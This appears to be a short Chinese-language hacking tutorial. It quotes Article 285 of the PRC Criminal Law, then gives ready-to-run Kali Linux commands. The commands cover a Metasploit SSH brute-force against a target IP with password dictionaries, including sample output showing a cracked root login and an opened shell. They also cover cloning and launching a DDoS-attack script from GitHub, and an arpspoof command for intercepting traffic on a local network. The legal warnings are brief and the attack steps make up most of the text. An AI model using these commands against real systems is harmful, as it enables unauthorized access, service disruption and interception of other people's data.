中华人民共和国刑法

1
2
3
4
5
6
7
8
9
10
11
12
13
 根据我国《刑法》的规定,非法侵入计算机信息系统罪的客体要件是国家重要领域和要害部门的计算机
信息系统安全;客观要件是行为人实施了违反国家规定侵入国家重要计算机信息系统的行为;主体要件是
一般主体。主观方面表现为故意。
《中华人民共和国刑法》
第二百八十五条 【非法侵入计算机信息系统罪】违反国家规定,侵入国家事务、国防建设、尖端科学技
术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。
【非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定,侵入前款规定以外的计算
机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算
机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重
的,处三年以上七年以下有期徒刑,并处罚金。
【提供侵入、非法控制计算机信息系统程序、工具罪】提供专门用于侵入、非法控制计算机信息系统的程
序、工具,或者明知他人实施侵入、非法控制计算机信息系统的违法犯罪行为而为其提供程序、工具,情
节严重的,依照前款的规定处罚。

前提

1
2
3
4
5
6
7
* 遵守中华人民共和国刑法
* 请遵守中华人民共和国刑法
* 请一定遵守中华人民共和国刑法
* 了解kali基本知识
* 知道字典什么意思
* 知道ssh是什么意思
* 一些网络基本知识

用Kali实现ssh爆破

方法

进入msfconsole程序

1
msfconsole

选择ssh_login模块

1
use auxiliary/scanner/ssh/ssh_login

导入攻击目标IP地址

1
set RHOSTS $IP

导入用户字典(绝对路径)

1
set USER_FILE /root/user.txt

导入密码字典(绝对路径)

1
set PASS_FILE /root/passwd.txt

指定ssh登录端口

1
set RPORT $port

运行

1
run

假如成功爆破,那么结果(例如)就是

1
2
3
[*] 192.168.20.100:22 - Starting bruteforce
[+] 192.168.20.100:22 - Success: 'root:admin' 'uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux zhangyulin 3.10.0-862.el7.x86_64 #1 SMP Fri Apr 20 16:44:24 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 1 opened (192.168.20.90:43727 -> 192.168.20.100:22) at 2022-12-10 15:48:40 +0800
  • 账号:root
  • 密码:admin

少年好自为之

ddos

方法

下载包

1
git clone https://github.com/Ha3MrX/DDos-Attack
1
cd DDos-Attack

添加执行权限

1
chmod +x ddos-attack.py

启动

1
python ddos-attack.py

arp欺骗

方法
1
2
* 知道网关地址和被攻击的IP地址
* 同一局域网内
1
arpspoof -i eth0 -t <pc-ip> <gateway-ip>